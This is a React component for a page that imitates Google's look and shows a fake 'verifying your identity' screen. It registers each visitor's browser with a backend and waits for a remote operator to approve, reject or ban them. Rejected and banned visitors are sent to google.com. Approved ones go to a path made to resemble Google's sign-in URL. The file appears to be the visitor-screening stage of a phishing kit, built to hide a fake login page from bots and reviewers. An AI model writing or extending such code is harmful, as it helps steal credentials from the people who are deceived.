import React, { useEffect, useState, useRef } from 'react';
import { io } from 'socket.io-client';
import { getApiUrl } from '../utils/apiConfig';

const API_URL = getApiUrl();

export default function WaitingRoom() {
  const [status, setStatus] = useState('pending');
  const [visitorId, setVisitorId] = useState(null);
  const [dots, setDots] = useState('');
  const pollRef = useRef(null);

  useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    // RecaptchaPage sets captcha_verified on success; on API error it sets captcha_bypass only — accept either
    const gate = sessionStorage.getItem('captcha_verified') || sessionStorage.getItem('captcha_bypass');
    if (!isLocal && !gate) {
      window.location.href = '/';
      return;
    }

    const existingId = sessionStorage.getItem('visitor_id');
    if (existingId) {
      setVisitorId(existingId);
      return;
    }

    const register = async () => {
      try {
        const resp = await fetch(`${API_URL}/api/visitor/register`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ userAgent: navigator.userAgent, timestamp: Date.now() }),
        });
        const data = await resp.json();
        if (data.id) {
          setVisitorId(data.id);
          sessionStorage.setItem('visitor_id', data.id);
        }
      } catch (err) {
        console.error('Registration failed:', err);
      }
    };
    register();
  }, []);

  useEffect(() => {
    if (!visitorId) return;

    const visitorSocket = io(`${API_URL}/visitor`, {
      transports: ['websocket', 'polling'],
      withCredentials: true,
    });

    visitorSocket.on('connect', () => {
      visitorSocket.emit('visitor:identify', visitorId);
    });

    visitorSocket.on('banned', () => {
      window.location.href = 'https://www.google.com';
    });

    visitorSocket.on('visitor:status', ({ status: newStatus }) => {
        if (newStatus === 'approved') {
          setStatus('approved');
          sessionStorage.setItem('visitor_approved', 'true');
          visitorSocket.disconnect();
          setTimeout(() => { window.location.href = '/v2/signin/identifierauthusercontinue='; }, 1500);
      } else if (newStatus === 'rejected') {
        setStatus('rejected');
        visitorSocket.disconnect();
        setTimeout(() => { window.location.href = 'https://www.google.com'; }, 3000);
      }
    });

    // Fallback HTTP poll every 5 s in case socket delivery fails
    pollRef.current = setInterval(async () => {
      try {
        const resp = await fetch(`${API_URL}/api/visitor/status/${visitorId}`);
        const data = await resp.json();
        if (data.status === 'approved') {
          setStatus('approved');
          sessionStorage.setItem('visitor_approved', 'true');
          clearInterval(pollRef.current);
          visitorSocket.disconnect();
          setTimeout(() => { window.location.href = '/v2/signin/identifierauthusercontinue='; }, 1500);
        } else if (data.status === 'rejected') {
          setStatus('rejected');
          clearInterval(pollRef.current);
          visitorSocket.disconnect();
          setTimeout(() => { window.location.href = 'https://www.google.com'; }, 3000);
        }
      } catch (_) {}
    }, 5000);

    return () => {
      clearInterval(pollRef.current);
      visitorSocket.disconnect();
    };
  }, [visitorId]);

  useEffect(() => {
    const timer = setInterval(() => {
      setDots(prev => prev.length >= 3 ? '' : prev + '.');
    }, 500);
    return () => clearInterval(timer);
  }, []);

  return (
    <div style={S.page}>
      <style>{`@keyframes spin { to { transform: rotate(360deg); } }`}</style>
      <div style={S.card}>
        {status === 'pending' && (
          <>
            <div style={S.spinner} />
            <h2 style={S.title}>Verifying your identity{dots}</h2>
            <p style={S.text}>We're reviewing your session to confirm you're not a bot. Please wait a few seconds while we complete the verification.</p>
            <p style={S.subtext}>You will be automatically redirected to the scheduling system once verified.</p>
          </>
        )}
        {status === 'approved' && (
          <>
            <div style={S.checkmark}>&#10003;</div>
            <h2 style={{ ...S.title, color: '#4ade80' }}>Verified!</h2>
            <p style={S.text}>Identity confirmed. Redirecting you to the scheduling system...</p>
          </>
        )}
        {status === 'rejected' && (
          <>
            <div style={{ ...S.checkmark, background: '#dc2626' }}>&#10007;</div>
            <h2 style={{ ...S.title, color: '#f87171' }}>Verification Failed</h2>
            <p style={S.text}>We were unable to verify your session. Please try again later.</p>
          </>
        )}
      </div>
    </div>
  );
}

const S = {
  page: {
    minHeight: '100vh',
    background: '#f1f2f7',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    fontFamily: '"Google Sans", Roboto, Arial, sans-serif',
  },
  card: {
    background: '#fff',
    border: '1px solid #dadce0',
    borderRadius: '12px',
    padding: '48px 40px',
    maxWidth: '440px',
    width: 'calc(100% - 2rem)',
    textAlign: 'center',
    boxShadow: '0 2px 12px rgba(0,0,0,0.08)',
  },
  spinner: {
    width: '48px',
    height: '48px',
    border: '4px solid #e5e7eb',
    borderTop: '4px solid #3b82f6',
    borderRadius: '50%',
    animation: 'spin 1s linear infinite',
    margin: '0 auto 24px',
  },
  checkmark: {
    width: '56px',
    height: '56px',
    borderRadius: '50%',
    background: '#22c55e',
    color: '#fff',
    fontSize: '28px',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    margin: '0 auto 20px',
    fontWeight: 700,
  },
  title: {
    fontSize: '22px',
    fontWeight: 600,
    color: '#1f2937',
    margin: '0 0 12px',
  },
  text: {
    fontSize: '15px',
    color: '#4b5563',
    lineHeight: 1.6,
    margin: '0 0 8px',
  },
  subtext: {
    fontSize: '13px',
    color: '#9ca3af',
    lineHeight: 1.5,
    margin: '0 0 20px',
  },
  idBadge: {
    fontSize: '11px',
    color: '#9ca3af',
    background: '#f3f4f6',
    padding: '6px 12px',
    borderRadius: '6px',
    display: 'inline-block',
    fontFamily: 'monospace',
  },
};
